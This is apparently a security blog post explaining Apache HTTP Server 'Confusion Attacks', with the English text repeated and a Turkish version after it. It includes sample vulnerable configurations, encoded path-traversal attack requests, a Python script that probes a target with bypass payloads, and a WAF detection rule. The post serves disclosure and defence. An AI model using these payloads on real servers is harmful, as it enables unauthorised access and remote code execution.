Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server
Wed May 27 2026
Category: Security Research
Introduction: #1 Web Hacking Technique of 2024
Security researcher Orange Tsai presented one of the most impactful discoveries of 2024 at Black Hat USA: Confusion Attacks — a new class of vulnerabilities targeting the semantic inconsistencies hidden inside Apache HTTP Server's module pipeline.
The research ranked #1 on PortSwigger's "Top 10 Web Hacking Techniques of 2024" list and resulted in 6 CVEs (CVE-2024-38472 through CVE-2024-38477).
The Core Problem: Semantic Ambiguity
Apache HTTP Server is composed of multiple modules: mod_rewrite, mod_proxy, mod_authz_core, mod_cgi, and others. Each module processes an HTTP request at a different point in the pipeline.
The problem: different modules can interpret the same URL differently.
Classic example: the %2F character (URL-encoded /).
mod_authz_core(ACL check) receives the raw URL:/api%2F../admin→ doesn't match the/adminrule → ALLOWmod_rewriteprocesses the same URL and decodes it:%2F → /→/api/../admin→/admin→ forwarded to backend
The ACL sees a "safe" path, while the backend handler receives the real, decoded path. This gap is the attack surface.
Three Confusion Types
1. Filename Confusion — CVE-2024-38474 / CVE-2024-38473
mod_rewrite does not normalize the URL before the ACL check. The ACL decides on the raw URL; mod_rewrite decodes it afterward.
Vulnerable configuration:
<Location "/admin">
Require ip 192.168.1.0/24
</Location>
RewriteEngine On
RewriteRule "^/api/(.+)$" "/var/www/api/$1" [L]
Attack request:
GET /api%2F../admin/panel HTTP/1.1
Host: target.com
Step 1 — ACL: /api%2F../admin/panel → doesn't match /admin rule → PASS
Step 2 — mod_rewrite: decodes %2F → / → /api/../admin/panel → /admin/panel → forwarded to backend
Result: Protected resource is exposed, or RCE is triggered.
2. DocumentRoot Confusion — CVE-2024-38476 / CVE-2024-38472
In reverse proxy configurations (ProxyPass), Apache's path interpretation can cause an encoded request to reach a backend that should have been blocked.
Vulnerable configuration:
ProxyPass "/app" "http://internal-backend:8080/app"
<Location "/app/admin">
Require all denied
</Location>
Attack request:
GET /app%2F..%2Fadmin/config HTTP/1.1
The ACL doesn't match /app/admin (characters are still encoded). ProxyPass decodes the path and forwards /admin/config to the backend. The backend serves the restricted resource.
This technique enables SSRF to internal services, unauthorized file reads, and backend RCE.
3. Handler Confusion — CVE-2024-38475 / CVE-2024-38477
mod_rewrite routes a request to the wrong handler. If that handler is mod_cgi or mod_php, the file is executed.
Vulnerable configuration:
RewriteEngine On
RewriteRule "^/static/(.+\.gif)$" "/var/www/static/$1" [L]
AddHandler cgi-script .cgi
Attack request:
GET /static/../../cgi-bin/shell.cgi HTTP/1.1
If the rewrite rule processes without strict path enforcement, the path normalizes to /cgi-bin/shell.cgi, which is then executed by the CGI handler — direct RCE.
Attack Chain Visualized
PoC — Encoded Path Bypass Test
import requests
TARGET = "http://target.com"
payloads = [
"/api%2F../admin/config",
"/api%2e%2e/admin/config",
"/api/..%2Fadmin/config",
"/api/%2e%2e/admin/config",
]
for payload in payloads:
r = requests.get(TARGET + payload, allow_redirects=False)
status = "[!] BYPASS" if r.status_code == 200 else " blocked"
print(f"{status}: {payload} → {r.status_code}")
Affected Versions
- Apache HTTP Server 2.4.0 through 2.4.59
mod_rewrite,mod_proxy, ormod_cgimust be active- Fixed in: Apache 2.4.60 (July 2024)
Detection and Mitigation
1. Update Apache to 2.4.60 or later.
2. Disable encoded slash decoding:
AllowEncodedSlashes NoDecode
3. Avoid the [NE] flag (no-escape) in RewriteRule directives — it forces decoding.
4. WAF rules should check both encoded and decoded forms:
SecRule REQUEST_URI "@rx (?i)(%2f|%2e%2e|/\.\.)" \
"id:1001,deny,msg:'Encoded Path Traversal'"
5. Add a normalizing layer in front of the reverse proxy (e.g., Nginx with merge_slashes on).
Conclusion
Confusion Attacks define a new vulnerability class that doesn't arise from a single module bug — it emerges from inter-module inconsistency. Security analysis of individual modules is insufficient; the interactions between modules must be modeled as part of the threat surface.
Orange Tsai's research demonstrated that a 20-year-old software stack running on millions of production servers can still harbor entire classes of undiscovered vulnerabilities. The lesson: trust boundaries between framework layers are attack surface.
CVEs: CVE-2024-38472, CVE-2024-38473, CVE-2024-38474, CVE-2024-38475, CVE-2024-38476, CVE-2024-38477
Disclosure: July 2024
Researcher: Orange Tsai / DEVCORE Research
Conference: Black Hat USA 2024
Reference: https://blog.orange.tw/posts/2024-08-confusion-attacks-en/
Introduction: #1 Web Hacking Technique of 2024
Security researcher Orange Tsai presented one of the most impactful discoveries of 2024 at Black Hat USA: Confusion Attacks — a new class of vulnerabilities targeting the semantic inconsistencies hidden inside Apache HTTP Server's module pipeline.
The research ranked #1 on PortSwigger's "Top 10 Web Hacking Techniques of 2024" list and resulted in 6 CVEs (CVE-2024-38472 through CVE-2024-38477).
The Core Problem: Semantic Ambiguity
Apache HTTP Server is composed of multiple modules: mod_rewrite, mod_proxy, mod_authz_core, mod_cgi, and others. Each module processes an HTTP request at a different point in the pipeline.
The problem: different modules can interpret the same URL differently.
Classic example: the %2F character (URL-encoded /).
mod_authz_core(ACL check) receives the raw URL:/api%2F../admin→ doesn't match the/adminrule → ALLOWmod_rewriteprocesses the same URL and decodes it:%2F → /→/api/../admin→/admin→ forwarded to backend
The ACL sees a "safe" path, while the backend handler receives the real, decoded path. This gap is the attack surface.
Three Confusion Types
1. Filename Confusion — CVE-2024-38474 / CVE-2024-38473
mod_rewrite does not normalize the URL before the ACL check. The ACL decides on the raw URL; mod_rewrite decodes it afterward.
Vulnerable configuration:
<Location "/admin">
Require ip 192.168.1.0/24
</Location>
RewriteEngine On
RewriteRule "^/api/(.+)$" "/var/www/api/$1" [L]
Attack request:
GET /api%2F../admin/panel HTTP/1.1
Host: target.com
Step 1 — ACL: /api%2F../admin/panel → doesn't match /admin rule → PASS
Step 2 — mod_rewrite: decodes %2F → / → /api/../admin/panel → /admin/panel → forwarded to backend
Result: Protected resource is exposed, or RCE is triggered.
2. DocumentRoot Confusion — CVE-2024-38476 / CVE-2024-38472
In reverse proxy configurations (ProxyPass), Apache's path interpretation can cause an encoded request to reach a backend that should have been blocked.
Vulnerable configuration:
ProxyPass "/app" "http://internal-backend:8080/app"
<Location "/app/admin">
Require all denied
</Location>
Attack request:
GET /app%2F..%2Fadmin/config HTTP/1.1
The ACL doesn't match /app/admin (characters are still encoded). ProxyPass decodes the path and forwards /admin/config to the backend. The backend serves the restricted resource.
This technique enables SSRF to internal services, unauthorized file reads, and backend RCE.
3. Handler Confusion — CVE-2024-38475 / CVE-2024-38477
mod_rewrite routes a request to the wrong handler. If that handler is mod_cgi or mod_php, the file is executed.
Vulnerable configuration:
RewriteEngine On
RewriteRule "^/static/(.+\.gif)$" "/var/www/static/$1" [L]
AddHandler cgi-script .cgi
Attack request:
GET /static/../../cgi-bin/shell.cgi HTTP/1.1
If the rewrite rule processes without strict path enforcement, the path normalizes to /cgi-bin/shell.cgi, which is then executed by the CGI handler — direct RCE.
Attack Chain Visualized
PoC — Encoded Path Bypass Test
import requests
TARGET = "http://target.com"
payloads = [
"/api%2F../admin/config",
"/api%2e%2e/admin/config",
"/api/..%2Fadmin/config",
"/api/%2e%2e/admin/config",
]
for payload in payloads:
r = requests.get(TARGET + payload, allow_redirects=False)
status = "[!] BYPASS" if r.status_code == 200 else " blocked"
print(f"{status}: {payload} → {r.status_code}")
Affected Versions
- Apache HTTP Server 2.4.0 through 2.4.59
mod_rewrite,mod_proxy, ormod_cgimust be active- Fixed in: Apache 2.4.60 (July 2024)
Detection and Mitigation
1. Update Apache to 2.4.60 or later.
2. Disable encoded slash decoding:
AllowEncodedSlashes NoDecode
3. Avoid the [NE] flag (no-escape) in RewriteRule directives — it forces decoding.
4. WAF rules should check both encoded and decoded forms:
SecRule REQUEST_URI "@rx (?i)(%2f|%2e%2e|/\.\.)" \
"id:1001,deny,msg:'Encoded Path Traversal'"
5. Add a normalizing layer in front of the reverse proxy (e.g., Nginx with merge_slashes on).
Conclusion
Confusion Attacks define a new vulnerability class that doesn't arise from a single module bug — it emerges from inter-module inconsistency. Security analysis of individual modules is insufficient; the interactions between modules must be modeled as part of the threat surface.
Orange Tsai's research demonstrated that a 20-year-old software stack running on millions of production servers can still harbor entire classes of undiscovered vulnerabilities. The lesson: trust boundaries between framework layers are attack surface.
CVEs: CVE-2024-38472, CVE-2024-38473, CVE-2024-38474, CVE-2024-38475, CVE-2024-38476, CVE-2024-38477
Disclosure: July 2024
Researcher: Orange Tsai / DEVCORE Research
Conference: Black Hat USA 2024
Reference: https://blog.orange.tw/posts/2024-08-confusion-attacks-en/
Giriş: 2024'ün En İyi Saldırı Tekniği
Güvenlik araştırmacısı Orange Tsai, Black Hat USA 2024 konferansında güvenlik dünyasını sarsan bir araştırma sundu. Apache HTTP Server'daki gizli semantik belirsizlikleri kullanarak ACL bypass, SSRF ve unauthenticated RCE zincirleri oluşturmak mümkün.
Bu araştırma, PortSwigger'ın "2024 Yılının En İyi 10 Web Hacking Tekniği" listesinde birinci sıraya yerleşti. Güvenlik açıkları CVE-2024-38472'den CVE-2024-38477'ye kadar uzanan 6 farklı CVE ile belgelendi.
Temel Sorun: Semantik Belirsizlik Nedir?
Apache HTTP Server birden fazla modülden oluşur: mod_rewrite, mod_proxy, mod_authz_core, mod_cgi vb. Her modül bir HTTP isteğini pipeline'ın farklı bir noktasında işler.
Problem şu: Farklı modüller aynı URL'yi farklı biçimlerde yorumlayabilir.
Klasik bir örnek: %2F karakteri.
mod_authz_core(ACL kontrolü) URL'yi ham haliyle alır:/api%2F../admin→/adminkuralıyla eşleşmez → izin verilirmod_rewriteaynı URL'yi decode eder:%2F → /→/api/../admin→/admin→ backend'e iletilir
ACL "güvenli" görürken, backend handler gerçek yolu alır. Bu boşluk, tam bir bypass zincirine dönüşür.
Üç Confusion Türü
1. Filename Confusion — CVE-2024-38474 / CVE-2024-38473
mod_rewrite, ACL denetiminden önce URL'yi normalize etmez. ACL ham URL üzerinden karar verir, ancak mod_rewrite sonradan decode eder.
Örnek savunmasız yapılandırma:
<Location "/admin">
Require ip 192.168.1.0/24
</Location>
RewriteEngine On
RewriteRule "^/api/(.+)$" "/var/www/api/$1" [L]
Saldırı:
GET /api%2F../admin/panel HTTP/1.1
Host: target.com
Adım 1 — ACL: /api%2F../admin/panel → /admin kuralıyla eşleşmez → PASS
Adım 2 — mod_rewrite: %2F → / → /api/../admin/panel → /admin/panel → backend'e iletilir
Sonuç: Korumalı kaynak ifşa edilir ya da RCE tetiklenir.
2. DocumentRoot Confusion — CVE-2024-38476 / CVE-2024-38472
Ters proxy yapılandırmalarında (ProxyPass), Apache'nin yol yorumlaması backend'e farklı bir istek iletmesine neden olabilir.
Örnek savunmasız yapılandırma:
ProxyPass "/app" "http://internal-backend:8080/app"
<Location "/app/admin">
Require all denied
</Location>
Saldırı:
GET /app%2F..%2Fadmin/config HTTP/1.1
ACL /app/admin kuralıyla eşleşmez (encoded karakterler). ProxyPass decode edilmiş yolu backend'e iletir: /admin/config. Backend bu kısıtlı kaynağı döndürür.
Bu teknik; internal servislere SSRF, yetkisiz dosya okuma ve backend RCE için kullanılabilir.
3. Handler Confusion — CVE-2024-38475 / CVE-2024-38477
mod_rewrite bir isteği yanlış handler'a yönlendirir. Handler mod_cgi veya mod_php ise gelen dosya çalıştırılır.
Örnek savunmasız yapılandırma:
RewriteEngine On
RewriteRule "^/static/(.+\.gif)$" "/var/www/static/$1" [L]
AddHandler cgi-script .cgi
Saldırı:
GET /static/../../cgi-bin/shell.cgi HTTP/1.1
Rewrite kuralı .gif uzantısıyla eşleşemez ancak NoDecode flag yoksa yol normalize edilir ve /cgi-bin/shell.cgi CGI handler üzerinden çalıştırılır. Bu doğrudan RCE anlamına gelir.
Saldırı Zinciri: Görselleştirilmiş
PoC — Encoded Path Bypass Testi
import requests
TARGET = "http://target.com"
# Filename Confusion PoC
payloads = [
"/api%2F../admin/config", # %2F bypass
"/api%2e%2e/admin/config", # %2E%2E bypass
"/api/..%2Fadmin/config", # mixed encoding
"/api/%2e%2e/admin/config", # double-dot encoded
]
for payload in payloads:
r = requests.get(TARGET + payload, allow_redirects=False)
if r.status_code == 200:
print(f"[!] BYPASS: {payload} → {r.status_code}")
else:
print(f" BLOCKED: {payload} → {r.status_code}")
Hangi Apache Versiyonları Etkilendi?
- Apache HTTP Server 2.4.0 – 2.4.59 arası tüm sürümler
mod_rewrite,mod_proxy,mod_cgiaktifse etkilenir- Düzeltme: Apache 2.4.60 (Temmuz 2024)
Tespit ve Önlem
1. Güncelleme: Apache 2.4.60 veya daha yeni bir sürüme yükseltin.
2. AllowEncodedSlashes ayarı:
AllowEncodedSlashes NoDecode
Bu ayar, URL'deki encoded slash karakterlerinin decode edilmesini engeller.
3. RewriteRule'larda [NE] flag kullanmaktan kaçının (no-escape flag decode eder).
4. WAF kurallarında hem encoded hem decoded form kontrol edilmeli:
# Hem /admin hem %2Fadmin'i engelle
SecRule REQUEST_URI "@rx (?i)(%2f|%2e%2e|/\.\./)" \
"id:1001,deny,msg:'Encoded Path Traversal'"
5. Reverse proxy önünde normalize edici bir katman ekleyin (örn: Nginx ile merge_slashes on).
Sonuç
Confusion Attacks, tek bir modül açığı yerine modüller arası tutarsızlıktan doğan yeni bir saldırı kategorisini tanımlar. Özellikle şunları gösterir: Yalnızca bireysel modülleri test etmek yeterli değildir — güvenlik, modüller arası etkileşim analizini de kapsamalıdır.
Orange Tsai, bu araştırmayla Apache gibi milyonlarca sunucuda çalışan bir altyapının 20 yıllık bir bug sınıfına sahip olabileceğini ortaya koydu.
CVE: CVE-2024-38472, CVE-2024-38473, CVE-2024-38474, CVE-2024-38475, CVE-2024-38476, CVE-2024-38477
İlk Açıklama: Temmuz 2024
Araştırmacı: Orange Tsai / DEVCORE Research
Konferans: Black Hat USA 2024